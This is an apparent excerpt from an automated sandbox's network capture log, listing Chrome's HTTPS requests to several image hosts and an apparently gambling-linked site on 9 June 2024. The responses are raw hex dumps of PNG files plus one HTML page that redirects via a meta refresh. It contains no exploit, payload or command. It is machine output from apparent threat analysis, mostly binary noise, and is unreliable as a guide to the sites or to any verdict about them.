                                                                                                                                                          2024-06-09 22:41:22 UTC204INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 80 01 d8 0f 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 20 22 60 00 8e 14 29 06 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 0c c0 7e 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 11 01 03 70 a4 48 31 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 60 00 f6 03 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 88 08 18
                                                                                                                                                          Data Ascii: @ @ @ @ @ @ @ "`) @ @ @~ @ @ @pH1 @ @ @ ` @ @ @
                                                                                                                                                          2024-06-09 22:41:22 UTC2776INData Raw: 80 23 45 8a 41 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 03 b0 1f 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 40 44 c0 00 1c 29 52 0c 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 18 80 fd 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 22 02 06 e0 48 91 62 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 c0 00 ec 07 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 10 11 30 00 47 8a 14 83 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 06 60 3f 40 80 00
                                                                                                                                                          Data Ascii: #EA @ @ @ @ @ @ @@D)R @ @ @ @ @ @"Hb @ @ @ @ @ @ @ 0G @ @ @`?@
                                                                                                                                                          2024-06-09 22:41:22 UTC4096INData Raw: 40 80 00 01 02 11 01 03 70 a4 48 31 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 60 00 f6 03 04 08 10 20 40 80 00 8e 21 8d 99 00 00 20 00 49 44 41 54 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 88 08 18 80 23 45 8a 41 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 03 b0 1f 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 40 44 c0 00 1c 29 52 0c 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 18 80 fd 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 22 02 06 e0 48 91 62 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                                                                                                                          Data Ascii: @pH1 @ @ @ ` @! IDAT @ @#EA @ @ @ @ @ @ @@D)R @ @ @ @ @ @"Hb @ @
                                                                                                                                                          2024-06-09 22:41:22 UTC2844INData Raw: 06 60 37 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 88 80 01 38 52 a4 18 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 30 00 bb 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 44 04 0c c0 91 22 c5 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 80 01 d8 0d 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 20 22 60 00 8e 14 29 06 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 0c c0 6e 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 11 01 03 70 a4 48 31
                                                                                                                                                          Data Ascii: `7@ @ @ @8R @ @ @0 @ @ @D" @ @ @ @ @ @ @ @ "`) @ @ @n @ @ @pH1
                                                                                                                                                          2024-06-09 22:41:22 UTC4096INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 6c 13 30 ca 6f f3 f3 6a 02 04 08 10 20 70 43 81 d3 9f 2f 2f af 5b de 6f d3 8b b7 7c b0 d7 12 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 e7 05 0c f3 ae 83 00 01 02 23 05 36 0f c0 23 d5 76 1e da 28 bf f3 82 3c 1e 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 cc 14 30 ca cf ec 5d 6a 02 0f 16 30 00 3f 18 dc c7 cd 15 30 cc cf ed 5e 72 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 d8 a9 80 51 7e a7 c5 78 ac 2d 02 06 e0 2d 7a 5e 4b 80 c0 a1 05 8c f2 87 ae cf c3 13 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 40 55 c0 30 bf a9 59 03 f0 26 3e 2f 26 40 80 00 81 5b 0a 18 e5 6f a9 e9 bd 08 10 20 40 80 00 01 02 04 08 10
                                                                                                                                                          Data Ascii: @ @l0oj pC//[o| @ @ @#6#v(< @ @0]j0?0^r @ @Q~x--z^K @ @ @@U0Y&>/&@[o @
                                                                                                                                                          2024-06-09 22:41:22 UTC2844INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 03 b0 1b 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 40 44 c0 00 1c 29 52 0c 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 18 80 dd 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 22 02 06 e0 48 91 62 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 c0 00 ec 06 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 10 11 30 00 47 8a 14 83 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 06 60 37 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                                                                                                                          Data Ascii: @ @ @ @ @ @ @@D)R @ @ @ @ @ @"Hb @ @ @ @ @ @ @ 0G @ @ @`7@ @


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          633192.168.2.55041723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC609OUTGET /pc/image-pc/index/382/slot/img_title.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 14180
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:16 GMT
                                                                                                                                                          ETag: "64c0a20c-3764"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE18[4],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473789
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a17f76d41193c35ddb252221d71c4d86
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118211
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC14180INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 df 00 00 00 47 08 06 00 00 00 87 cc 92 02 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                                                                                                                                          Data Ascii: PNGIHDRGtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          634192.168.2.55037138.174.148.24434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC633OUTGET / HTTP/1.1
                                                                                                                                                          Host: f21714.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:22 UTC34INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: no-cache,no-store
                                                                                                                                                          2024-06-09 22:41:22 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                                                                          2024-06-09 22:41:22 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:22 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                                                                          2024-06-09 22:41:22 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:41:22 UTC5INData Raw: 35 38 30 0d 0a
                                                                                                                                                          Data Ascii: 580
                                                                                                                                                          2024-06-09 22:41:22 UTC1415INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 32 3b 75 72 6c 3d 2f 3f 5f 5f 43 42 4b 3d 33 38 34 63 39 38 30 31 33 37 39 33 33 33 34 32 31 32 33 34 63 33 31 34 36 34 37 33 63 30 38 66 37 31 37 31 37 39 37 32 38 38 33 5f 31 32 31 33 37 35 33 36 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2e 73 6b 2d 74 68 72 65 65 2d 62 6f 75 6e 63 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f 3b 0a 09 77 69 64 74 68 3a 20 38
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="refresh" content="2;url=/?__CBK=384c9801379333421234c3146473c08f71717972883_12137536" /><style type="text/css">.sk-three-bounce {position: absolute;top: 50%;left: 50%;margin: 40px auto;width: 8


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          635192.168.2.55041990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC383OUTGET /pc/image-pc/index/382/footer/icon_sport.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 3109
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:12 GMT
                                                                                                                                                          ETag: "64c0a208-c25"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[2],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE5[4],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063148
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: c7e4cba7c87449f1c099f8cac6240de5
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528852
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC3109INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 06 00 00 00 8c 45 6a dd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 29 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR66EjtEXtSoftwareAdobe ImageReadyqe<)iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          636192.168.2.55042323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC377OUTGET /pc/image-pc/index/383/menu/nv6.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1513
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:21 GMT
                                                                                                                                                          ETag: "64bf926d-5e9"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[4],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE16[2],EU-FRA-paris-GLOBAL1-CACHE16[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464727
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5c87e20b5f8f7234c2f6e40cc4d278bc
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127273
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC1513INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 19 08 06 00 00 00 22 c0 4e 27 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDR"N'tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          637192.168.2.55042423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC377OUTGET /pc/image-pc/index/383/menu/nv7.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 960
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:22 GMT
                                                                                                                                                          ETag: "64bf926e-3c0"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE19[3],EU-FRA-paris-GLOBAL1-CACHE27[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464727
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 68eacef0703baba756633e7c39ded0e8
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127273
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC960INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1d 00 00 00 1b 08 06 00 00 00 80 ca 84 12 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 03 72 49 44 41 54 48 89 bd d6 7b 88 54 65 18 c7 f1 cf cc 19 cf 6a 92 f5 4f 59 74 8f 2e b0 65 b9 49 1b a5 86 56 4b 46 62 64 a3 e4 1a b2 51 b6 dd a8 24 36 49 69 4d 37 0d 4d ca ae 32 5d 58 2d 15 aa c5 7f 12 c1 86 b2 30 2f 19 ca 9a 42 85 6d 17 08 31 49 33 bc cc 36 eb 6e fd 71 ce e4 68 bb ee cc 0a fe e0 70 de f3 9e e7 79 bf cf fb bc e7 7d de 93 50 a2 b2 99 f4 74 5c 8f a6 9a fa 96 6d a5 fa 75 a7 64 19 b6 3b 71 0f be c9 66 d2 93 4e 15 74 5f 7c ef 87 e6 6c 26 7d f5 a9 80 9e 59 d4 ae c0 f3 a7 02 3a e4 b8 e7 3b b3 99 f4 a0 be 40 13 3d bd c8 66 d2 03 70 0b aa 71 0d 6e c5 e9 c7 99 fd 8e 1f f0 2b 7e c6
                                                                                                                                                          Data Ascii: PNGIHDRpHYsrIDATH{TejOYt.eIVKFbdQ$6IiM7M2]X-0/Bm1I36nqhpy}Pt\mud;qfNt_|l&}Y:;@=fpqn+~


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          638192.168.2.55042090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC652OUTGET /pc/image-pc/index/383/header_icon.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 722
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:16 GMT
                                                                                                                                                          ETag: "64bf9268-2d2"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE15[3],EU-FRA-paris-GLOBAL1-CACHE21[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467536
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 2cf395023dee84fbec8a6388c14632f7
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124464
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
